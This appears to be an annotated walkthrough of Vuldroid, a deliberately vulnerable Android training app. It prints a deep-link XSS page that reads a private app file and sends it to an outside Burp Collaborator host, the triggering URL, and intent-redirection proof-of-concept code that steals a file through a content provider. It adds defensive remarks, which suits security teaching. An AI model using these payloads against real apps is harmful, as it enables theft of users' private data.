[UPDATED] Vuldroid App Walkthrough

Manifest File
<intent-filter android:autoVerify="true">
Deeplink XSS
<!DOCTYPE html>
<html>
<body>
<h1>File Sent to Server</h1>
<!--
  Demo page for the walkthrough's deep-link case: its script reads a file:// path
  with XMLHttpRequest and forwards the contents to a remote URL.
  NOTE(review): this presupposes that the WebView rendering the page has JavaScript
  enabled and permits file-scheme reads from a file-origin page; confirm against the
  target app's WebSettings.
  Defensive takeaways: keep setAllowFileAccess, setAllowFileAccessFromFileURLs and
  setAllowUniversalAccessFromFileURLs disabled, and check a deep link's url parameter
  against an allowlist of https hosts before handing it to the WebView.
-->
<script>
// Reads `filepath` with a synchronous GET, then sends a second synchronous GET to
// `url` with the response text appended as the query string.
function sendmefiles(filepath, url){
var xhttp = new XMLHttpRequest();
// There is no readyState/status check: this handler runs on every readystatechange
// event, not only when the read has completed.
xhttp.onreadystatechange = function() {
var upload = new XMLHttpRequest();
// responseText is concatenated without encodeURIComponent, so the file contents show
// up verbatim in the request line; useful to know when hunting for this in proxy logs.
upload.open("GET", url + "?" + this.responseText , false)
upload.send()
};
xhttp.open("GET", filepath, false);
xhttp.send();
}
// sendmefiles(...) is called immediately on this line; what gets assigned to
// window.onload is its return value (undefined), not a handler.
window.onload=sendmefiles("file:///data/user/0/com.vuldroid.application/files/example.txt", "https://burpcollaborator.com")
</script>
</body>
</html>
http://medium.com?url=file:///exploit.html
// Inner Intent: carries all four URI-permission grant flags, names an activity in the
// calling (proof-of-concept) package as its component, and uses the target app's
// content provider authority as its data URI.
Intent extra = new Intent();
extra.setFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION | Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
extra.setClassName(getPackageName(), "com.notify.vuldroidexploit.FileStealDisplay");
extra.setData(Uri.parse("content://com.vuldroid.application.provider/"));

// Outer Intent: addressed explicitly to the target's RoutingActivity, with the inner
// Intent attached under the "router_component" extra.
// NOTE(review): RoutingActivity's code is not shown here; presumably it launches the
// embedded Intent as-is, in which case the grant flags are applied with the target
// app's identity (intent redirection). Confirm against the target source.
// Defensive takeaways: do not start Intents taken from extras without checking the
// resolved component against an allowlist, clear the FLAG_GRANT_* bits before
// forwarding, and keep routing activities non-exported unless they must be reachable.
Intent intent = new Intent();
intent.setClassName("com.vuldroid.application", "com.vuldroid.application.RoutingActivity");
intent.putExtra("router_component", extra);
startActivity(intent);
// Receiving side of the demo: builds a content URI from the Intent's data string plus
// a fixed path, opens it through the ContentResolver and shows what it reads in a TextView.
TextView t1=findViewById(R.id.filestealv);
// NOTE(review): the "root/" prefix suggests the provider maps a path named "root" to
// the filesystem root (e.g. a FileProvider <root-path> entry); confirm in the target's
// provider paths XML. Defensive takeaway: expose only a dedicated subdirectory through
// the provider and keep the provider non-exported, so a granted URI cannot reach the
// app's private files directory.
Uri uri = Uri.parse(getIntent().getDataString() + "root/data/data/com.vuldroid.application/files/example.txt");

try {
InputStream i = getContentResolver().openInputStream(uri);
// No charset argument is given to the reader.
InputStreamReader isReader = new InputStreamReader(i);
BufferedReader reader = new BufferedReader(isReader);
// sb is never used below.
StringBuffer sb = new StringBuffer();
String str;
while((str = reader.readLine())!= null){
// setText replaces the view's text on each pass, so only the most recently read line
// stays visible.
t1.setText(str);
// The underlying stream is closed inside the loop, after the first line is read;
// reader itself is never closed.
i.close();
}

}catch (FileNotFoundException e) {
// Failures are only printed as a stack trace; nothing is shown in the UI.
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
Sender File
Receiver Ends
Broadcast receiver
